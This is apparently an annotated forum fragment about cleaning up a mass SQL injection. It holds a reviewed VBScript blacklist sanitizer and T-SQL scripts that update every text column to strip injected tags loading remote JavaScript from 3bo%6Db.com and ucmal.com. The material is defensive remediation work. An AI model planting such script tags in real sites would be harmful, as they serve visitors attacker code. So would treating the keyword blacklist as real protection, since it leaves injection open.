,请大家帮忙解决!", "upDate": "2021-05-28T15:22:27+08:00" }
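' FormatSQL: trims the input, runs it through DSConvert, then rewrites quotes,
' angle brackets, parentheses, "*", "--", "|", "=" and a few keywords as HTML
' character references, and returns the result.
'
' NOTE(review): as shown on the page, every replacement string had been rendered
' back to the raw character, so each call replaced a string with itself and the
' double-quote lines did not parse. The character references below are a
' reconstruction and should be confirmed against the original source.
'
' NOTE(review): this is a blacklist plus HTML encoding, not an injection control.
' Values that go into SQL should be bound as ADODB.Command parameters, and
' Server.HTMLEncode applied where the value is written into a page. Keep this
' function only as a secondary layer.
'
' str is passed ByRef (the VBScript default), so the caller's variable is
' modified as well as returned; that behaviour is unchanged.
function FormatSQL(str)
if isnull(str) then
str = ""
FormatSQL = ""   ' return an empty string explicitly instead of Empty
exit function
end if
str=trim(str)
str=DSConvert(str,0)   ' DSConvert is defined elsewhere; its effect is not visible here
' "&" and ";" are deliberately left alone: the first save is fine, but when a
' record is edited and saved again the stored references would be encoded twice.
str=replace(str,"'","&#39;") ' single quote
str=replace(str,"""","&quot;") ' double quote
' NOTE(review): the next six lines match the literal text "chr(9)", "chr(10)", ...
' because the first argument is quoted. If the control characters themselves were
' intended, the argument should be the unquoted Chr(n) call. Confirm the intent.
str=replace(str,"chr(9)"," ") ' space
str=replace(str,"chr(10)","<br>") ' line feed
str=replace(str,"chr(13)","<br>") ' carriage return
str=replace(str,"chr(32)"," ") ' space
str=replace(str,"chr(34)","&quot;") ' double quote
str=replace(str,"chr(39)","&#39;") ' single quote
str=replace(str,"<","&lt;") ' left angle bracket
str=replace(str,">","&gt;") ' right angle bracket
str=replace(str,"(","&#40;") ' left parenthesis
str=replace(str,")","&#41;") ' right parenthesis
str=replace(str,"*","&#42;") ' asterisk
str=replace(str,"--","&#45;&#45;") ' SQL comment marker
' Keyword rewrites: the "t" in script/select/insert/update becomes a character
' reference. Replace defaults to a binary (case-sensitive) comparison, so only
' the lower-case spelling is rewritten, which is one more reason a keyword
' blacklist is not a dependable control.
str=Replace(str, "script", "scrip&#116;")
str=Replace(str, "select", "selec&#116;")
str=Replace(str, "insert", "inser&#116;")
str=Replace(str, "update", "upda&#116;e")
str=Replace(str, "exec", "&#101;xec") ' NOTE(review): encoded letter is a guess, "exec" has no "t"
str=replace(str,"|","&#124;") ' pipe
str=replace(str,"=","&#61;") ' equals sign
FormatSQL=str
end function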
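-- Clean-up after a mass injection: walks every text-like column of every user
-- table and strips one specific injected <script> tag from the stored values.
-- This only removes the stored payload. The injectable query that let it in
-- still has to be found and parameterized, or the data will be rewritten again.
-- Take a backup before running; the statement touches every row of every
-- matching column.
DECLARE @T sysname, @C sysname, @sql nvarchar(4000)
DECLARE Table_Cursor CURSOR FOR
    SELECT a.name, b.name
    FROM sysobjects AS a
    INNER JOIN syscolumns AS b
        ON a.id = b.id
    WHERE a.xtype = 'U'                     -- 'U' = user table; lower-case 'u' matches nothing under a case-sensitive collation
      AND b.xtype IN (99, 35, 231, 167)     -- ntext, text, nvarchar, varchar
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE (@@FETCH_STATUS = 0)
BEGIN
    -- QUOTENAME escapes any "]" in the object name, which the hand-built
    -- '[' + name + ']' form did not. EXEC() accepts only literals and
    -- variables, so the statement is assembled in @sql first.
    -- NOTE(review): REPLACE does not accept text/ntext arguments, so columns
    -- with xtype 35/99 will raise an error here; on SQL Server 2005+ they
    -- need a CAST to varchar(max)/nvarchar(max). Confirm the target version.
    SET @sql = N'update ' + QUOTENAME(@T)
             + N' set ' + QUOTENAME(@C)
             + N'=replace(' + QUOTENAME(@C)
             + N',''<script src=http://3bo%6Db.com/c.js> </script>'','''')'
    EXEC (@sql)
    FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor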
-- Builds one UPDATE ... REPLACE statement per column of the chosen type in
-- every user table, then runs each generated statement.
DECLARE @fieldtype sysname
SET @fieldtype = 'varchar'   -- only columns of this type are processed; rerun with other type names as needed

-- Removal pass.
-- NOTE(review): the pattern below reads "<script_src=" with an underscore,
-- presumably altered so the forum would not render it. REPLACE only removes
-- exact matches, so compare it with the stored payload before running.
DECLARE hCForEach CURSOR GLOBAL
FOR
    SELECT
        N'update ' + QUOTENAME(o.name)
        + N' set ' + QUOTENAME(c.name)
        + N' = replace(' + QUOTENAME(c.name)
        + ',''<script_src=http://ucmal.com/0.js> </script>'','''')'
    FROM sysobjects AS o
    INNER JOIN syscolumns AS c
        ON o.id = c.id
    INNER JOIN systypes AS t
        ON c.xusertype = t.xusertype
    WHERE OBJECTPROPERTY(o.id, N'IsUserTable') = 1
      AND t.name = @fieldtype

-- sp_MSforeach_Worker is an undocumented system procedure; it appears to read
-- the global cursor hCForEach and execute each row as a command. Confirm it is
-- available on the target server.
EXEC sp_MSforeach_Worker @command1 = N'?'
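-- Strips the injected <script> tag from columns a..f of one table in a single
-- statement. "table" and a..f are placeholders for the real table and column
-- names. The assignments in a SET list must be comma-separated; the original
-- listing had no commas and would not parse.
-- The search string starts with a space, so only occurrences preceded by a
-- space are removed.
UPDATE table
SET a = REPLACE(a, ' <script src=http://3bo%6Db.com/c.js> </script>', ''),
    b = REPLACE(b, ' <script src=http://3bo%6Db.com/c.js> </script>', ''),
    c = REPLACE(c, ' <script src=http://3bo%6Db.com/c.js> </script>', ''),
    d = REPLACE(d, ' <script src=http://3bo%6Db.com/c.js> </script>', ''),
    e = REPLACE(e, ' <script src=http://3bo%6Db.com/c.js> </script>', ''),
    f = REPLACE(f, ' <script src=http://3bo%6Db.com/c.js> </script>', '')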
-- Generic single-column template: "table" and "col" are placeholders, and the
-- quoted search text is a stand-in for the exact string to remove.
UPDATE table
SET col = REPLACE(col, '你要替换的字符串', '')